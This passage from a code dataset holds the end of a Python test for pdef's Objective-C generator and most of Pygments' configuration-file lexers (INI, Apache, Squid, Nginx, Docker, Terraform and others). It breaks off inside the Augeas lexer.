path = os.path.join(os.path.dirname(__file__), 'test.pdef')
return pdefc.compile(path)
def test_generate__should_generate_objc_files(self):
dst = tempfile.mkdtemp('objc-pdef-tests')
try:
package = self.package()
objc.generate(package, dst, prefix='PD')
files = ['PDTestNumber', 'PDTestStruct', 'PDTestInterface']
for file in files:
path = os.path.join(dst, file)
header = '%s.h' % path
impl = '%s.m' % path
assert os.path.exists(header), 'Header file does not exist %s' % header
assert os.path.exists(impl), 'Impl file does not exist %s' % impl
finally:
shutil.rmtree(dst, ignore_errors=True)
def test_objc_name__should_prefix_and_suffix_struct(self):
struct = lang.Struct('Test')
name = self.generator.objc_name(struct)
assert name == 'PDTestStruct'
def test_objc_name__should_prefix_and_suffix_iface(self):
iface = lang.Interface('Test')
name = self.generator.objc_name(iface)
assert name == 'PDTestInterface'
def test_method_options__should_join_method_type_and_request(self):
method = lang.Method('method', type=lang.MethodType.POST,
args=[lang.Argument('arg', lang.INT32)],
is_request=True)
options = self.generator.objc_method_options(method)
assert options == 'PDMethodPost|PDMethodRequest'
|
pdef/pdef
|
compiler/pdefc/objc/test.py
|
Python
|
apache-2.0
| 1,863
|
"""
pygments.lexers.configs
~~~~~~~~~~~~~~~~~~~~~~~
Lexers for configuration file formats.
:copyright: Copyright 2006-2021 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
from pygments.lexer import RegexLexer, default, words, bygroups, include, using
from pygments.token import Text, Comment, Operator, Keyword, Name, String, \
Number, Punctuation, Whitespace, Literal, Generic
from pygments.lexers.shell import BashLexer
from pygments.lexers.data import JsonLexer
__all__ = ['IniLexer', 'RegeditLexer', 'PropertiesLexer', 'KconfigLexer',
'Cfengine3Lexer', 'ApacheConfLexer', 'SquidConfLexer',
'NginxConfLexer', 'LighttpdConfLexer', 'DockerLexer',
'TerraformLexer', 'TermcapLexer', 'TerminfoLexer',
'PkgConfigLexer', 'PacmanConfLexer', 'AugeasLexer', 'TOMLLexer',
'NestedTextLexer', 'SingularityLexer']
class IniLexer(RegexLexer):
"""
Lexer for configuration files in INI style.
"""
name = 'INI'
aliases = ['ini', 'cfg', 'dosini']
filenames = [
'*.ini', '*.cfg', '*.inf',
# systemd unit files
# https://www.freedesktop.org/software/systemd/man/systemd.unit.html
'*.service', '*.socket', '*.device', '*.mount', '*.automount',
'*.swap', '*.target', '*.path', '*.timer', '*.slice', '*.scope',
]
mimetypes = ['text/x-ini', 'text/inf']
tokens = {
'root': [
(r'\s+', Text),
(r'[;#].*', Comment.Single),
(r'\[.*?\]$', Keyword),
(r'(.*?)([ \t]*)(=)([ \t]*)([^\t\n]*)',
bygroups(Name.Attribute, Text, Operator, Text, String)),
# standalone option, supported by some INI parsers
(r'(.+?)$', Name.Attribute),
],
}
def analyse_text(text):
npos = text.find('\n')
if npos < 3:
return False
return text[0] == '[' and text[npos-1] == ']'
class RegeditLexer(RegexLexer):
"""
Lexer for `Windows Registry
<http://en.wikipedia.org/wiki/Windows_Registry#.REG_files>`_ files produced
by regedit.
.. versionadded:: 1.6
"""
name = 'reg'
aliases = ['registry']
filenames = ['*.reg']
mimetypes = ['text/x-windows-registry']
tokens = {
'root': [
(r'Windows Registry Editor.*', Text),
(r'\s+', Text),
(r'[;#].*', Comment.Single),
(r'(\[)(-?)(HKEY_[A-Z_]+)(.*?\])$',
bygroups(Keyword, Operator, Name.Builtin, Keyword)),
# String keys, which obey somewhat normal escaping
(r'("(?:\\"|\\\\|[^"])+")([ \t]*)(=)([ \t]*)',
bygroups(Name.Attribute, Text, Operator, Text),
'value'),
# Bare keys (includes @)
(r'(.*?)([ \t]*)(=)([ \t]*)',
bygroups(Name.Attribute, Text, Operator, Text),
'value'),
],
'value': [
(r'-', Operator, '#pop'), # delete value
(r'(dword|hex(?:\([0-9a-fA-F]\))?)(:)([0-9a-fA-F,]+)',
bygroups(Name.Variable, Punctuation, Number), '#pop'),
# As far as I know, .reg files do not support line continuation.
(r'.+', String, '#pop'),
default('#pop'),
]
}
def analyse_text(text):
return text.startswith('Windows Registry Editor')
class PropertiesLexer(RegexLexer):
"""
Lexer for configuration files in Java's properties format.
Note: trailing whitespace counts as part of the value as per spec
.. versionadded:: 1.4
"""
name = 'Properties'
aliases = ['properties', 'jproperties']
filenames = ['*.properties']
mimetypes = ['text/x-java-properties']
tokens = {
'root': [
(r'^(\w+)([ \t])(\w+\s*)$', bygroups(Name.Attribute, Text, String)),
(r'^\w+(\\[ \t]\w*)*$', Name.Attribute),
(r'(^ *)([#!].*)', bygroups(Text, Comment)),
# More controversial comments
(r'(^ *)((?:;|//).*)', bygroups(Text, Comment)),
(r'(.*?)([ \t]*)([=:])([ \t]*)(.*(?:(?<=\\)\n.*)*)',
bygroups(Name.Attribute, Text, Operator, Text, String)),
(r'\s', Text),
],
}
def _rx_indent(level):
# Kconfig *always* interprets a tab as 8 spaces, so this is the default.
# Edit this if you are in an environment where KconfigLexer gets expanded
# input (tabs expanded to spaces) and the expansion tab width is != 8,
# e.g. in connection with Trac (trac.ini, [mimeviewer], tab_width).
# Value range here is 2 <= {tab_width} <= 8.
tab_width = 8
# Regex matching a given indentation {level}, assuming that indentation is
# a multiple of {tab_width}. In other cases there might be problems.
if tab_width == 2:
space_repeat = '+'
else:
space_repeat = '{1,%d}' % (tab_width - 1)
if level == 1:
level_repeat = ''
else:
level_repeat = '{%s}' % level
return r'(?:\t| %s\t| {%s})%s.*\n' % (space_repeat, tab_width, level_repeat)
class KconfigLexer(RegexLexer):
"""
For Linux-style Kconfig files.
.. versionadded:: 1.6
"""
name = 'Kconfig'
aliases = ['kconfig', 'menuconfig', 'linux-config', 'kernel-config']
# Adjust this if new kconfig file names appear in your environment
filenames = ['Kconfig*', '*Config.in*', 'external.in*',
'standard-modules.in']
mimetypes = ['text/x-kconfig']
# No re.MULTILINE, indentation-aware help text needs line-by-line handling
flags = 0
def call_indent(level):
# If indentation >= {level} is detected, enter state 'indent{level}'
return (_rx_indent(level), String.Doc, 'indent%s' % level)
def do_indent(level):
# Print paragraphs of indentation level >= {level} as String.Doc,
# ignoring blank lines. Then return to 'root' state.
return [
(_rx_indent(level), String.Doc),
(r'\s*\n', Text),
default('#pop:2')
]
tokens = {
'root': [
(r'\s+', Text),
(r'#.*?\n', Comment.Single),
(words((
'mainmenu', 'config', 'menuconfig', 'choice', 'endchoice',
'comment', 'menu', 'endmenu', 'visible if', 'if', 'endif',
'source', 'prompt', 'select', 'depends on', 'default',
'range', 'option'), suffix=r'\b'),
Keyword),
(r'(---help---|help)[\t ]*\n', Keyword, 'help'),
(r'(bool|tristate|string|hex|int|defconfig_list|modules|env)\b',
Name.Builtin),
(r'[!=&|]', Operator),
(r'[()]', Punctuation),
(r'[0-9]+', Number.Integer),
(r"'(''|[^'])*'", String.Single),
(r'"(""|[^"])*"', String.Double),
(r'\S+', Text),
],
# Help text is indented, multi-line and ends when a lower indentation
# level is detected.
'help': [
# Skip blank lines after help token, if any
(r'\s*\n', Text),
# Determine the first help line's indentation level heuristically(!).
# Attention: this is not perfect, but works for 99% of "normal"
# indentation schemes up to a max. indentation level of 7.
call_indent(7),
call_indent(6),
call_indent(5),
call_indent(4),
call_indent(3),
call_indent(2),
call_indent(1),
default('#pop'), # for incomplete help sections without text
],
# Handle text for indentation levels 7 to 1
'indent7': do_indent(7),
'indent6': do_indent(6),
'indent5': do_indent(5),
'indent4': do_indent(4),
'indent3': do_indent(3),
'indent2': do_indent(2),
'indent1': do_indent(1),
}
class Cfengine3Lexer(RegexLexer):
"""
Lexer for `CFEngine3 <http://cfengine.org>`_ policy files.
.. versionadded:: 1.5
"""
name = 'CFEngine3'
aliases = ['cfengine3', 'cf3']
filenames = ['*.cf']
mimetypes = []
tokens = {
'root': [
(r'#.*?\n', Comment),
(r'(body)(\s+)(\S+)(\s+)(control)',
bygroups(Keyword, Text, Keyword, Text, Keyword)),
(r'(body|bundle)(\s+)(\S+)(\s+)(\w+)(\()',
bygroups(Keyword, Text, Keyword, Text, Name.Function, Punctuation),
'arglist'),
(r'(body|bundle)(\s+)(\S+)(\s+)(\w+)',
bygroups(Keyword, Text, Keyword, Text, Name.Function)),
(r'(")([^"]+)(")(\s+)(string|slist|int|real)(\s*)(=>)(\s*)',
bygroups(Punctuation, Name.Variable, Punctuation,
Text, Keyword.Type, Text, Operator, Text)),
(r'(\S+)(\s*)(=>)(\s*)',
bygroups(Keyword.Reserved, Text, Operator, Text)),
(r'"', String, 'string'),
(r'(\w+)(\()', bygroups(Name.Function, Punctuation)),
(r'([\w.!&|()]+)(::)', bygroups(Name.Class, Punctuation)),
(r'(\w+)(:)', bygroups(Keyword.Declaration, Punctuation)),
(r'@[{(][^)}]+[})]', Name.Variable),
(r'[(){},;]', Punctuation),
(r'=>', Operator),
(r'->', Operator),
(r'\d+\.\d+', Number.Float),
(r'\d+', Number.Integer),
(r'\w+', Name.Function),
(r'\s+', Text),
],
'string': [
(r'\$[{(]', String.Interpol, 'interpol'),
(r'\\.', String.Escape),
(r'"', String, '#pop'),
(r'\n', String),
(r'.', String),
],
'interpol': [
(r'\$[{(]', String.Interpol, '#push'),
(r'[})]', String.Interpol, '#pop'),
(r'[^${()}]+', String.Interpol),
],
'arglist': [
(r'\)', Punctuation, '#pop'),
(r',', Punctuation),
(r'\w+', Name.Variable),
(r'\s+', Text),
],
}
class ApacheConfLexer(RegexLexer):
"""
Lexer for configuration files following the Apache config file
format.
.. versionadded:: 0.6
"""
name = 'ApacheConf'
aliases = ['apacheconf', 'aconf', 'apache']
filenames = ['.htaccess', 'apache.conf', 'apache2.conf']
mimetypes = ['text/x-apacheconf']
flags = re.MULTILINE | re.IGNORECASE
tokens = {
'root': [
(r'\s+', Text),
(r'#(.*\\\n)+.*$|(#.*?)$', Comment),
(r'(<[^\s>/][^\s>]*)(?:(\s+)(.*))?(>)',
bygroups(Name.Tag, Text, String, Name.Tag)),
(r'(</[^\s>]+)(>)',
bygroups(Name.Tag, Name.Tag)),
(r'[a-z]\w*', Name.Builtin, 'value'),
(r'\.+', Text),
],
'value': [
(r'\\\n', Text),
(r'$', Text, '#pop'),
(r'\\', Text),
(r'[^\S\n]+', Text),
(r'\d+\.\d+\.\d+\.\d+(?:/\d+)?', Number),
(r'\d+', Number),
(r'/([*a-z0-9][*\w./-]+)', String.Other),
(r'(on|off|none|any|all|double|email|dns|min|minimal|'
r'os|productonly|full|emerg|alert|crit|error|warn|'
r'notice|info|debug|registry|script|inetd|standalone|'
r'user|group)\b', Keyword),
(r'"([^"\\]*(?:\\(.|\n)[^"\\]*)*)"', String.Double),
(r'[^\s"\\]+', Text)
],
}
class SquidConfLexer(RegexLexer):
"""
Lexer for `squid <http://www.squid-cache.org/>`_ configuration files.
.. versionadded:: 0.9
"""
name = 'SquidConf'
aliases = ['squidconf', 'squid.conf', 'squid']
filenames = ['squid.conf']
mimetypes = ['text/x-squidconf']
flags = re.IGNORECASE
keywords = (
"access_log", "acl", "always_direct", "announce_host",
"announce_period", "announce_port", "announce_to", "anonymize_headers",
"append_domain", "as_whois_server", "auth_param_basic",
"authenticate_children", "authenticate_program", "authenticate_ttl",
"broken_posts", "buffered_logs", "cache_access_log", "cache_announce",
"cache_dir", "cache_dns_program", "cache_effective_group",
"cache_effective_user", "cache_host", "cache_host_acl",
"cache_host_domain", "cache_log", "cache_mem", "cache_mem_high",
"cache_mem_low", "cache_mgr", "cachemgr_passwd", "cache_peer",
"cache_peer_access", "cache_replacement_policy", "cache_stoplist",
"cache_stoplist_pattern", "cache_store_log", "cache_swap",
"cache_swap_high", "cache_swap_log", "cache_swap_low", "client_db",
"client_lifetime", "client_netmask", "connect_timeout", "coredump_dir",
"dead_peer_timeout", "debug_options", "delay_access", "delay_class",
"delay_initial_bucket_level", "delay_parameters", "delay_pools",
"deny_info", "dns_children", "dns_defnames", "dns_nameservers",
"dns_testnames", "emulate_httpd_log", "err_html_text",
"fake_user_agent", "firewall_ip", "forwarded_for", "forward_snmpd_port",
"fqdncache_size", "ftpget_options", "ftpget_program", "ftp_list_width",
"ftp_passive", "ftp_user", "half_closed_clients", "header_access",
"header_replace", "hierarchy_stoplist", "high_response_time_warning",
"high_page_fault_warning", "hosts_file", "htcp_port", "http_access",
"http_anonymizer", "httpd_accel", "httpd_accel_host",
"httpd_accel_port", "httpd_accel_uses_host_header",
"httpd_accel_with_proxy", "http_port", "http_reply_access",
"icp_access", "icp_hit_stale", "icp_port", "icp_query_timeout",
"ident_lookup", "ident_lookup_access", "ident_timeout",
"incoming_http_average", "incoming_icp_average", "inside_firewall",
"ipcache_high", "ipcache_low", "ipcache_size", "local_domain",
"local_ip", "logfile_rotate", "log_fqdn", "log_icp_queries",
"log_mime_hdrs", "maximum_object_size", "maximum_single_addr_tries",
"mcast_groups", "mcast_icp_query_timeout", "mcast_miss_addr",
"mcast_miss_encode_key", "mcast_miss_port", "memory_pools",
"memory_pools_limit", "memory_replacement_policy", "mime_table",
"min_http_poll_cnt", "min_icp_poll_cnt", "minimum_direct_hops",
"minimum_object_size", "minimum_retry_timeout", "miss_access",
"negative_dns_ttl", "negative_ttl", "neighbor_timeout",
"neighbor_type_domain", "netdb_high", "netdb_low", "netdb_ping_period",
"netdb_ping_rate", "never_direct", "no_cache", "passthrough_proxy",
"pconn_timeout", "pid_filename", "pinger_program", "positive_dns_ttl",
"prefer_direct", "proxy_auth", "proxy_auth_realm", "query_icmp",
"quick_abort", "quick_abort_max", "quick_abort_min",
"quick_abort_pct", "range_offset_limit", "read_timeout",
"redirect_children", "redirect_program",
"redirect_rewrites_host_header", "reference_age",
"refresh_pattern", "reload_into_ims", "request_body_max_size",
"request_size", "request_timeout", "shutdown_lifetime",
"single_parent_bypass", "siteselect_timeout", "snmp_access",
"snmp_incoming_address", "snmp_port", "source_ping", "ssl_proxy",
"store_avg_object_size", "store_objects_per_bucket",
"strip_query_terms", "swap_level1_dirs", "swap_level2_dirs",
"tcp_incoming_address", "tcp_outgoing_address", "tcp_recv_bufsize",
"test_reachability", "udp_hit_obj", "udp_hit_obj_size",
"udp_incoming_address", "udp_outgoing_address", "unique_hostname",
"unlinkd_program", "uri_whitespace", "useragent_log",
"visible_hostname", "wais_relay", "wais_relay_host", "wais_relay_port",
)
opts = (
"proxy-only", "weight", "ttl", "no-query", "default", "round-robin",
"multicast-responder", "on", "off", "all", "deny", "allow", "via",
"parent", "no-digest", "heap", "lru", "realm", "children", "q1", "q2",
"credentialsttl", "none", "disable", "offline_toggle", "diskd",
)
actions = (
"shutdown", "info", "parameter", "server_list", "client_list",
r'squid.conf',
)
actions_stats = (
"objects", "vm_objects", "utilization", "ipcache", "fqdncache", "dns",
"redirector", "io", "reply_headers", "filedescriptors", "netdb",
)
actions_log = ("status", "enable", "disable", "clear")
acls = (
"url_regex", "urlpath_regex", "referer_regex", "port", "proto",
"req_mime_type", "rep_mime_type", "method", "browser", "user", "src",
"dst", "time", "dstdomain", "ident", "snmp_community",
)
ip_re = (
r'(?:(?:(?:[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}|0x0*[0-9a-f]{1,2}|'
r'0+[1-3]?[0-7]{0,2})(?:\.(?:[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}|'
r'0x0*[0-9a-f]{1,2}|0+[1-3]?[0-7]{0,2})){3})|(?!.*::.*::)(?:(?!:)|'
r':(?=:))(?:[0-9a-f]{0,4}(?:(?<=::)|(?<!::):)){6}(?:[0-9a-f]{0,4}'
r'(?:(?<=::)|(?<!::):)[0-9a-f]{0,4}(?:(?<=::)|(?<!:)|(?<=:)(?<!::):)|'
r'(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)(?:\.(?:25[0-4]|2[0-4]\d|1\d\d|'
r'[1-9]?\d)){3}))'
)
tokens = {
'root': [
(r'\s+', Whitespace),
(r'#', Comment, 'comment'),
(words(keywords, prefix=r'\b', suffix=r'\b'), Keyword),
(words(opts, prefix=r'\b', suffix=r'\b'), Name.Constant),
# Actions
(words(actions, prefix=r'\b', suffix=r'\b'), String),
(words(actions_stats, prefix=r'stats/', suffix=r'\b'), String),
(words(actions_log, prefix=r'log/', suffix=r'='), String),
(words(acls, prefix=r'\b', suffix=r'\b'), Keyword),
(ip_re + r'(?:/(?:' + ip_re + r'|\b\d+\b))?', Number.Float),
(r'(?:\b\d+\b(?:-\b\d+|%)?)', Number),
(r'\S+', Text),
],
'comment': [
(r'\s*TAG:.*', String.Escape, '#pop'),
(r'.+', Comment, '#pop'),
default('#pop'),
],
}
class NginxConfLexer(RegexLexer):
"""
Lexer for `Nginx <http://nginx.net/>`_ configuration files.
.. versionadded:: 0.11
"""
name = 'Nginx configuration file'
aliases = ['nginx']
filenames = ['nginx.conf']
mimetypes = ['text/x-nginx-conf']
tokens = {
'root': [
(r'(include)(\s+)([^\s;]+)', bygroups(Keyword, Text, Name)),
(r'[^\s;#]+', Keyword, 'stmt'),
include('base'),
],
'block': [
(r'\}', Punctuation, '#pop:2'),
(r'[^\s;#]+', Keyword.Namespace, 'stmt'),
include('base'),
],
'stmt': [
(r'\{', Punctuation, 'block'),
(r';', Punctuation, '#pop'),
include('base'),
],
'base': [
(r'#.*\n', Comment.Single),
(r'on|off', Name.Constant),
(r'\$[^\s;#()]+', Name.Variable),
(r'([a-z0-9.-]+)(:)([0-9]+)',
bygroups(Name, Punctuation, Number.Integer)),
(r'[a-z-]+/[a-z-+]+', String), # mimetype
# (r'[a-zA-Z._-]+', Keyword),
(r'[0-9]+[km]?\b', Number.Integer),
(r'(~)(\s*)([^\s{]+)', bygroups(Punctuation, Text, String.Regex)),
(r'[:=~]', Punctuation),
(r'[^\s;#{}$]+', String), # catch all
(r'/[^\s;#]*', Name), # pathname
(r'\s+', Text),
(r'[$;]', Text), # leftover characters
],
}
class LighttpdConfLexer(RegexLexer):
"""
Lexer for `Lighttpd <http://lighttpd.net/>`_ configuration files.
.. versionadded:: 0.11
"""
name = 'Lighttpd configuration file'
aliases = ['lighttpd', 'lighty']
filenames = ['lighttpd.conf']
mimetypes = ['text/x-lighttpd-conf']
tokens = {
'root': [
(r'#.*\n', Comment.Single),
(r'/\S*', Name), # pathname
(r'[a-zA-Z._-]+', Keyword),
(r'\d+\.\d+\.\d+\.\d+(?:/\d+)?', Number),
(r'[0-9]+', Number),
(r'=>|=~|\+=|==|=|\+', Operator),
(r'\$[A-Z]+', Name.Builtin),
(r'[(){}\[\],]', Punctuation),
(r'"([^"\\]*(?:\\.[^"\\]*)*)"', String.Double),
(r'\s+', Text),
],
}
class DockerLexer(RegexLexer):
"""
Lexer for `Docker <http://docker.io>`_ configuration files.
.. versionadded:: 2.0
"""
name = 'Docker'
aliases = ['docker', 'dockerfile']
filenames = ['Dockerfile', '*.docker']
mimetypes = ['text/x-dockerfile-config']
_keywords = (r'(?:MAINTAINER|EXPOSE|WORKDIR|USER|STOPSIGNAL)')
_bash_keywords = (r'(?:RUN|CMD|ENTRYPOINT|ENV|ARG|LABEL|ADD|COPY)')
_lb = r'(?:\s*\\?\s*)' # dockerfile line break regex
flags = re.IGNORECASE | re.MULTILINE
tokens = {
'root': [
(r'#.*', Comment),
(r'(FROM)([ \t]*)(\S*)([ \t]*)(?:(AS)([ \t]*)(\S*))?',
bygroups(Keyword, Text, String, Text, Keyword, Text, String)),
(r'(ONBUILD)(%s)' % (_lb,), bygroups(Keyword, using(BashLexer))),
(r'(HEALTHCHECK)((%s--\w+=\w+%s)*)' % (_lb, _lb),
bygroups(Keyword, using(BashLexer))),
(r'(VOLUME|ENTRYPOINT|CMD|SHELL)(%s)(\[.*?\])' % (_lb,),
bygroups(Keyword, using(BashLexer), using(JsonLexer))),
(r'(LABEL|ENV|ARG)((%s\w+=\w+%s)*)' % (_lb, _lb),
bygroups(Keyword, using(BashLexer))),
(r'(%s|VOLUME)\b(.*)' % (_keywords), bygroups(Keyword, String)),
(r'(%s)' % (_bash_keywords,), Keyword),
(r'(.*\\\n)*.+', using(BashLexer)),
]
}
class TerraformLexer(RegexLexer):
"""
Lexer for `terraformi .tf files <https://www.terraform.io/>`_.
.. versionadded:: 2.1
"""
name = 'Terraform'
aliases = ['terraform', 'tf']
filenames = ['*.tf']
mimetypes = ['application/x-tf', 'application/x-terraform']
classes = ('backend', 'data', 'module', 'output', 'provider',
'provisioner', 'resource', 'variable')
classes_re = "({})".format(('|').join(classes))
types = ('string', 'number', 'bool', 'list', 'tuple', 'map', 'object', 'null')
numeric_functions = ('abs', 'ceil', 'floor', 'log', 'max',
'mix', 'parseint', 'pow', 'signum')
string_functions = ('chomp', 'format', 'formatlist', 'indent',
'join', 'lower', 'regex', 'regexall', 'replace',
'split', 'strrev', 'substr', 'title', 'trim',
'trimprefix', 'trimsuffix', 'trimspace', 'upper'
)
collection_functions = ('alltrue', 'anytrue', 'chunklist', 'coalesce',
'coalescelist', 'compact', 'concat', 'contains',
'distinct', 'element', 'flatten', 'index', 'keys',
'length', 'list', 'lookup', 'map', 'matchkeys',
'merge', 'range', 'reverse', 'setintersection',
'setproduct', 'setsubtract', 'setunion', 'slice',
'sort', 'sum', 'transpose', 'values', 'zipmap'
)
encoding_functions = ('base64decode', 'base64encode', 'base64gzip',
'csvdecode', 'jsondecode', 'jsonencode', 'textdecodebase64',
'textencodebase64', 'urlencode', 'yamldecode', 'yamlencode')
filesystem_functions = ('abspath', 'dirname', 'pathexpand', 'basename',
'file', 'fileexists', 'fileset', 'filebase64', 'templatefile')
date_time_functions = ('formatdate', 'timeadd', 'timestamp')
hash_crypto_functions = ('base64sha256', 'base64sha512', 'bcrypt', 'filebase64sha256',
'filebase64sha512', 'filemd5', 'filesha1', 'filesha256', 'filesha512',
'md5', 'rsadecrypt', 'sha1', 'sha256', 'sha512', 'uuid', 'uuidv5')
ip_network_functions = ('cidrhost', 'cidrnetmask', 'cidrsubnet', 'cidrsubnets')
type_conversion_functions = ('can', 'defaults', 'tobool', 'tolist', 'tomap',
'tonumber', 'toset', 'tostring', 'try')
builtins = numeric_functions + string_functions + collection_functions + encoding_functions +\
filesystem_functions + date_time_functions + hash_crypto_functions + ip_network_functions +\
type_conversion_functions
builtins_re = "({})".format(('|').join(builtins))
tokens = {
'root': [
include('basic'),
include('whitespace'),
# Strings
(r'(".*")', bygroups(String.Double)),
# Constants
(words(('true', 'false'), prefix=r'\b', suffix=r'\b'), Name.Constant),
# Types
(words(types, prefix=r'\b', suffix=r'\b'), Keyword.Type),
include('identifier'),
include('punctuation'),
(r'[0-9]+', Number),
],
'basic': [
(r'\s*/\*', Comment.Multiline, 'comment'),
(r'\s*#.*\n', Comment.Single),
include('whitespace'),
# e.g. terraform {
# e.g. egress {
(r'(\s*)([0-9a-zA-Z-_]+)(\s*)(=?)(\s*)(\{)',
bygroups(Text, Name.Builtin, Text, Operator, Text, Punctuation)),
# Assignment with attributes, e.g. something = ...
(r'(\s*)([0-9a-zA-Z-_]+)(\s*)(=)(\s*)',
bygroups(Text, Name.Attribute, Text, Operator, Text)),
# Assignment with environment variables and similar, e.g. "something" = ...
# or key value assignment, e.g. "SlotName" : ...
(r'(\s*)("\S+")(\s*)([=:])(\s*)',
bygroups(Text, Literal.String.Double, Text, Operator, Text)),
# Functions, e.g. jsonencode(element("value"))
(builtins_re + r'(\()', bygroups(Name.Function, Punctuation)),
# List of attributes, e.g. ignore_changes = [last_modified, filename]
(r'(\[)([a-z_,\s]+)(\])', bygroups(Punctuation, Name.Builtin, Punctuation)),
# e.g. resource "aws_security_group" "allow_tls" {
# e.g. backend "consul" {
(classes_re + r'(\s+)', bygroups(Keyword.Reserved, Text), 'blockname'),
],
'blockname': [
# e.g. resource "aws_security_group" "allow_tls" {
# e.g. backend "consul" {
(r'(\s*)("[0-9a-zA-Z-_]+")?(\s*)("[0-9a-zA-Z-_]+")(\s+)(\{)',
bygroups(Text, Name.Class, Text, Name.Variable, Text, Punctuation)),
],
'identifier': [
(r'\b(var\.[0-9a-zA-Z-_\.\[\]]+)\b', bygroups(Name.Variable)),
(r'\b([0-9a-zA-Z-_\[\]]+\.[0-9a-zA-Z-_\.\[\]]+)\b', bygroups(Name.Variable)),
],
'punctuation': [
(r'[\[\]()\{\},.?:!=]', Punctuation),
],
'comment': [
(r'[^*/]', Comment.Multiline),
(r'/\*', Comment.Multiline, '#push'),
(r'\*/', Comment.Multiline, '#pop'),
(r'[*/]', Comment.Multiline)
],
'whitespace': [
(r'\n', Text),
(r'\s+', Text),
(r'\\\n', Text),
],
}
class TermcapLexer(RegexLexer):
"""
Lexer for termcap database source.
This is very simple and minimal.
.. versionadded:: 2.1
"""
name = 'Termcap'
aliases = ['termcap']
filenames = ['termcap', 'termcap.src']
mimetypes = []
# NOTE:
# * multiline with trailing backslash
# * separator is ':'
# * to embed colon as data, we must use \072
# * space after separator is not allowed (mayve)
tokens = {
'root': [
(r'^#.*$', Comment),
(r'^[^\s#:|]+', Name.Tag, 'names'),
],
'names': [
(r'\n', Text, '#pop'),
(r':', Punctuation, 'defs'),
(r'\|', Punctuation),
(r'[^:|]+', Name.Attribute),
],
'defs': [
(r'\\\n[ \t]*', Text),
(r'\n[ \t]*', Text, '#pop:2'),
(r'(#)([0-9]+)', bygroups(Operator, Number)),
(r'=', Operator, 'data'),
(r':', Punctuation),
(r'[^\s:=#]+', Name.Class),
],
'data': [
(r'\\072', Literal),
(r':', Punctuation, '#pop'),
(r'[^:\\]+', Literal), # for performance
(r'.', Literal),
],
}
class TerminfoLexer(RegexLexer):
"""
Lexer for terminfo database source.
This is very simple and minimal.
.. versionadded:: 2.1
"""
name = 'Terminfo'
aliases = ['terminfo']
filenames = ['terminfo', 'terminfo.src']
mimetypes = []
# NOTE:
# * multiline with leading whitespace
# * separator is ','
# * to embed comma as data, we can use \,
# * space after separator is allowed
tokens = {
'root': [
(r'^#.*$', Comment),
(r'^[^\s#,|]+', Name.Tag, 'names'),
],
'names': [
(r'\n', Text, '#pop'),
(r'(,)([ \t]*)', bygroups(Punctuation, Text), 'defs'),
(r'\|', Punctuation),
(r'[^,|]+', Name.Attribute),
],
'defs': [
(r'\n[ \t]+', Text),
(r'\n', Text, '#pop:2'),
(r'(#)([0-9]+)', bygroups(Operator, Number)),
(r'=', Operator, 'data'),
(r'(,)([ \t]*)', bygroups(Punctuation, Text)),
(r'[^\s,=#]+', Name.Class),
],
'data': [
(r'\\[,\\]', Literal),
(r'(,)([ \t]*)', bygroups(Punctuation, Text), '#pop'),
(r'[^\\,]+', Literal), # for performance
(r'.', Literal),
],
}
class PkgConfigLexer(RegexLexer):
"""
Lexer for `pkg-config
<http://www.freedesktop.org/wiki/Software/pkg-config/>`_
(see also `manual page <http://linux.die.net/man/1/pkg-config>`_).
.. versionadded:: 2.1
"""
name = 'PkgConfig'
aliases = ['pkgconfig']
filenames = ['*.pc']
mimetypes = []
tokens = {
'root': [
(r'#.*$', Comment.Single),
# variable definitions
(r'^(\w+)(=)', bygroups(Name.Attribute, Operator)),
# keyword lines
(r'^([\w.]+)(:)',
bygroups(Name.Tag, Punctuation), 'spvalue'),
# variable references
include('interp'),
# fallback
(r'[^${}#=:\n.]+', Text),
(r'.', Text),
],
'interp': [
# you can escape literal "$" as "$$"
(r'\$\$', Text),
# variable references
(r'\$\{', String.Interpol, 'curly'),
],
'curly': [
(r'\}', String.Interpol, '#pop'),
(r'\w+', Name.Attribute),
],
'spvalue': [
include('interp'),
(r'#.*$', Comment.Single, '#pop'),
(r'\n', Text, '#pop'),
# fallback
(r'[^${}#\n]+', Text),
(r'.', Text),
],
}
class PacmanConfLexer(RegexLexer):
"""
Lexer for `pacman.conf
<https://www.archlinux.org/pacman/pacman.conf.5.html>`_.
Actually, IniLexer works almost fine for this format,
but it yield error token. It is because pacman.conf has
a form without assignment like:
UseSyslog
Color
TotalDownload
CheckSpace
VerbosePkgLists
These are flags to switch on.
.. versionadded:: 2.1
"""
name = 'PacmanConf'
aliases = ['pacmanconf']
filenames = ['pacman.conf']
mimetypes = []
tokens = {
'root': [
# comment
(r'#.*$', Comment.Single),
# section header
(r'^\s*\[.*?\]\s*$', Keyword),
# variable definitions
# (Leading space is allowed...)
(r'(\w+)(\s*)(=)',
bygroups(Name.Attribute, Text, Operator)),
# flags to on
(r'^(\s*)(\w+)(\s*)$',
bygroups(Text, Name.Attribute, Text)),
# built-in special values
(words((
'$repo', # repository
'$arch', # architecture
'%o', # outfile
'%u', # url
), suffix=r'\b'),
Name.Variable),
# fallback
(r'.', Text),
],
}
class AugeasLexer(RegexLexer):
"""
Lexer for `Augeas <http://augeas.net>`_.
.. versionadded:: 2.4
"""
name = 'Augeas'
aliases = ['augeas']
filenames = ['*.aug']
tokens = {
'root': [
(r'(module)(\s*)([^\s=]+)', bygroups(Keyword.Namespace, Text, Name.Namespace)),
(r'(let)(\s*)([^\s=]+)', bygroups(Keyword.Declaration, Text, Name.Variable)),
(r'(del|store|value|counter|seq|key|label|autoload|incl|excl|transform|test|get|put)(\s+)', bygroups(Name.Builtin, Text)),
(r'(\()([^:]+)(\:)(unit|string|regexp|lens|tree|filter)(\))', bygroups(Punctuation, Name.Variable, Punctuation, Keyword.Type, Punctuation)),
(r'\(\*', Comment.Multiline, 'comment'),
(r'[*+\-.;=?|]', Operator),
(r'[()\[\]{}]', Operator),
(r'"', String.Double, 'string'),
(r'\/', String.Regex, 'regex'),
(r'([A-Z]\w*)(\.)(\w+)', bygroups(Name.Namespace, Punctuation, Name.Variable)),
(r'.', Name.Variable),
(r'\s', Text),
],
'string': [
(r'\\.', String.Escape),
(r'[^"]', String.Double),
(r'"', String.Double, '#pop'),
],
'regex': [
(r'\\.', String.Escape),
(r'[^/]', String.Regex),
(r'\/', String.Regex, '#pop'),
],
'comment': [
